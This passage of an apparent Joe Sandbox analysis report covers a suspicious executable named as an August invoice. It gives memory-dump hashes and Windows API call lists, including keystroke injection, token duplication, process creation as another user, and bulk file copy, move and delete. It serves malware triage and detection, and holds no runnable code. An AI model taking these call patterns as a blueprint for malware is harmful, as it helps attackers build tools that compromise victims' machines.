                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                          • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                          • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                          • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                                                          • Opcode Fuzzy Hash: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                          • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                                                          • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                                                          • Opcode Fuzzy Hash: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                                                          • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                                                          APIs
                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                          • _memmove.LIBCMT ref: 00444B34
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: _malloc_memmove
                                                          • String ID:
                                                          • API String ID: 1183979061-0
                                                          • Opcode ID: 5456aa698ccb66e472ad2dc6bdf94112e2600af6ff6d776df7a489d92d6f0097
                                                          • Instruction ID: 1ab6fe9f530497837eb86deb75815884a9af672873ccf792f11a5e6f6739e6df
                                                          • Opcode Fuzzy Hash: 5456aa698ccb66e472ad2dc6bdf94112e2600af6ff6d776df7a489d92d6f0097
                                                          • Instruction Fuzzy Hash: E0016D3220410AAFD714DF2CC882DA7B3EDEF88318711492FE996C7251EA74F9508B94
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: __lock_file
                                                          • String ID:
                                                          • API String ID: 3031932315-0
                                                          • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                          • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                                          • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                          • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                                          APIs
                                                          • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: FileWrite
                                                          • String ID:
                                                          • API String ID: 3934441357-0
                                                          • Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                          • Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
                                                          • Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                          • Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: __wfsopen
                                                          • String ID:
                                                          • API String ID: 197181222-0
                                                          • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                          • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                                          • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                          • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                                          APIs
                                                          • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle
                                                          • String ID:
                                                          • API String ID: 2962429428-0
                                                          • Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                          • Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
                                                          • Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                          • Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
                                                          APIs
                                                          • Sleep.KERNELBASE(000001F4), ref: 0411A2B9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1741008117.0000000004118000.00000040.00000020.00020000.00000000.sdmp, Offset: 04118000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4118000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                          • Instruction ID: b9fd4a72b3dd8d12dde284bb187491c55973613ff9e576b5bd49df2fab264a60
                                                          • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                          • Instruction Fuzzy Hash: 7DE0E67494110DDFDB00DFB4D5496DD7FB4EF04301F100561FD01D2281D7319D509A62
                                                          APIs
                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                          • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                          • GetKeyState.USER32(00000011), ref: 0047C92D
                                                          • GetKeyState.USER32(00000009), ref: 0047C936
                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                          • GetKeyState.USER32(00000010), ref: 0047C953
                                                          • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                          • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                          • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                          • _wcsncpy.LIBCMT ref: 0047CA29
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                          • SendMessageW.USER32 ref: 0047CA7F
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                          • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                          • ImageList_SetDragCursorImage.COMCTL32(00AC0198,00000000,00000000,00000000), ref: 0047CB9B
                                                          • ImageList_BeginDrag.COMCTL32(00AC0198,00000000,000000F8,000000F0), ref: 0047CBAC
                                                          • SetCapture.USER32(?), ref: 0047CBB6
                                                          • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                          • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                          • ReleaseCapture.USER32 ref: 0047CC3A
                                                          • GetCursorPos.USER32(?), ref: 0047CC72
                                                          • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                          • SendMessageW.USER32 ref: 0047CD12
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                          • SendMessageW.USER32 ref: 0047CD80
                                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                          • GetCursorPos.USER32(?), ref: 0047CDC8
                                                          • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                          • GetParent.USER32(00000000), ref: 0047CDF7
                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                          • SendMessageW.USER32 ref: 0047CE93
                                                          • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,02F41B10,00000000,?,?,?,?), ref: 0047CF1C
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                          • SendMessageW.USER32 ref: 0047CF6B
                                                          • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,02F41B10,00000000,?,?,?,?), ref: 0047CFE6
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                          • String ID: @GUI_DRAGID$F
                                                          • API String ID: 3100379633-4164748364
                                                          • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                          • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                          • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                          • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                          APIs
                                                          • GetForegroundWindow.USER32 ref: 00434420
                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                          • IsIconic.USER32(?), ref: 0043444F
                                                          • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                          • SetForegroundWindow.USER32(?), ref: 0043446A
                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                          • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                          • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                          • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                          • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                          • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                          • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                          • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                          • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                          • String ID: Shell_TrayWnd
                                                          • API String ID: 2889586943-2988720461
                                                          • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                          • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                          • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                          • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                          APIs
                                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                          • CloseHandle.KERNEL32(?), ref: 004463A0
                                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                          • GetProcessWindowStation.USER32 ref: 004463D1
                                                          • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                          • _wcslen.LIBCMT ref: 00446498
                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                          • _wcsncpy.LIBCMT ref: 004464C0
                                                          • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                          • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                          • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                          • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                          • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                          • CloseDesktop.USER32(?), ref: 0044657A
                                                          • SetProcessWindowStation.USER32(?), ref: 00446588
                                                          • CloseHandle.KERNEL32(?), ref: 00446592
                                                          • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                          • String ID: $@OH$default$winsta0
                                                          • API String ID: 3324942560-3791954436
                                                          • Opcode ID: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                          • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                          • Opcode Fuzzy Hash: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                          • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                          APIs
                                                            • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe,0040F545,C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe,004A90E8,C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe,?,0040F545), ref: 0041013C
                                                            • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                                                            • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                                                            • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                                                            • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                          • _wcscat.LIBCMT ref: 0044BD94
                                                          • _wcscat.LIBCMT ref: 0044BDBD
                                                          • __wsplitpath.LIBCMT ref: 0044BDEA
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                                                          • _wcscpy.LIBCMT ref: 0044BE71
                                                          • _wcscat.LIBCMT ref: 0044BE83
                                                          • _wcscat.LIBCMT ref: 0044BE95
                                                          • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                                                          • DeleteFileW.KERNEL32(?), ref: 0044BED3
                                                          • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                                                          • DeleteFileW.KERNEL32(?), ref: 0044BF15
                                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                                                          • FindClose.KERNEL32(00000000), ref: 0044BF33
                                                          • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                                                          • FindClose.KERNEL32(00000000), ref: 0044BF7C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                          • String ID: \*.*
                                                          • API String ID: 2188072990-1173974218
                                                          • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                          • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                                                          • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                          • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                          • FindClose.KERNEL32(00000000), ref: 00478924
                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                          • __swprintf.LIBCMT ref: 004789D3
